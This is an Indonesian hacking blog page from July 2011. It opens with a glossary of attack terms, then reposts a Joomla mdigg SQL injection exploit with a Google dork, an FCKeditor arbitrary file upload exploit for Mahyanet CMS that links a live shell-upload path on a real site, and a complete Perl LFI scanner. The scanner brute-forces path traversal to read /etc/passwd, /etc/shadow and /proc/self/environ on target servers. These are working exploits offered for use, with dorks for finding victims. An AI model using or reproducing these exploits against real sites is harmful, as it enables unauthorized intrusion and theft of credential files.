Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

Fake Process
Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

Malicious Code/Script
Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

Flood
membanjiri target untuk tujuan target down. Flood = DoS.
macam2 flood:

Deface
Merubah tampilan halaman suatu website/index secara illegal

Tsunami flood
Membanjiri user dgn karakter2 berat dgn jumlah banyak,berbentuk spt gelombang tsunami.Tujuanya hanya membuat user disconnected. Tsunami flood hanya terjadi di Mirc atau dulu mah waktu gw doyan chat di Mig33 wkkk ada istilah tukang ngflood atau flooder wkkk dc dc ah ^_^

TCP Flood
Membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pada ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.

Hashing
Teknik mengindeks pada menajemen database dimana nilai kunci:key (yang mengindentifikasikan record)

Javascript injection
Suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

Keylogger
Merupakan mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

LFI (Local File Inclusion)
Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan)
ke page yang vulnerable (vulnerable LFI maksudnya).

Patch
Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Phising
Merupakan tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Port
Secara bahasa artinya penghubung. Port da 2 mcm:

port fisik
Penghubung antara cpu dgn hardware external.

Port service
penghubung antar service/layanan pada sistem.

Port Scanning
Memindai/mencari port-port yg terbuka pada suatu server.

Vurnerable
Sistem yang memiliki bug sehingga rentan terhadap berbagai macam serangan

RFI (Remote File Inclusion)
penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

Root
Pengguna dengan hak tertinggi didalam, dan tidak ada batasan wewenang, dalam komputer jaringan. Istilah ini diadaptasi dari sistem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

Shell
Inti dari sistem operasi. Shell mengendalikan kerja sistem operasi nya.

Shell intepreter
Bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

SQL Injection
Memasukkan (injeksi) command2 sql ke dalm query sql dlm prgram, memanipulasi query sql dlm program.

Trojan (Horse)
Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

Virus
Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

Worm (Cacing)
Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

XSS
Merupakan suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Rabu, 06 Juli 2011

Joomla mdigg SQL Injection




=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####


[*] ExpLo!T :

http://127.0.0.1/?act=story_lists&task=item&link_id=1'

http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]

http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |

Mahyanet CMS Shell Upload




--------------------------------------------------------------------------------
@ Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
@ Name: Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability
@ Vendor: http://mahyanet.com
@ Date: 2011-07-04
@ Author: Ashiyane Digital Security Team
@ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com
@ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
@ Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Powered by : Mahyanet.com"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerabilities ~>

[+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html

[+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File]

[+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt
--------------------------------------------------------------------------------
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
@ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
@ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206
@ 1337 Member:
@ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
@ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
<<./By XroGuE >>

LFI Scanner 4.0










#!/usr/bin/perl
#
# ////////////////////////////////////
# Viper LFI Scanner Ver. 4.0
# ////////////////////////////////////
#
# Title : Viper Lfi Scanner Ver. 4.0
# Author: Bl4ck.Viper
# From : Azarbycan
# Date : 2011/07/06
# Category : Scanner
# Home : www.Skote-vahshat.com
# Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
#
#
# Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd
#
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

use HTTP::Request;
use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";
menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
goto lfi;
}
if ($menu =~ /2/){
goto env;
}
else {
print"\n\n";
print "\t\tUnknow Command\n";
goto menu;
};


lfi:;
print "\n\n";
print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'....//etc/passwd',
'....//....//etc/passwd',
'....//....//....//etc/passwd',
'....//....//....//....//etc/passwd',
'....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//....//etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'....//etc/passwd',
'....//....//etc/passwd',
'....//....//....//etc/passwd',
'....//....//....//....//etc/passwd',
'....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//....//etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user');


foreach $scan(@lfi){

$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
env:;
print "\n\n";
print "\t\t\tWelcom To Environ Section\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";

@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ');

foreach $scan_env(@env){

$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan_env..........[$msg]\n";
}


# Bl4ck.Viper Turkish Hacker
# Copyright 2010 Black Viper

Sumber==>http://packetstormsecurity.org/files/view/102848/lfi-scanner-ver4.0.pl.txt
◄ Posting Baru Posting Lama ►
 

Copyright 2012 Iksandarkmission: Juli 2011 ./Kejahatanku Adalah Keingintahuanku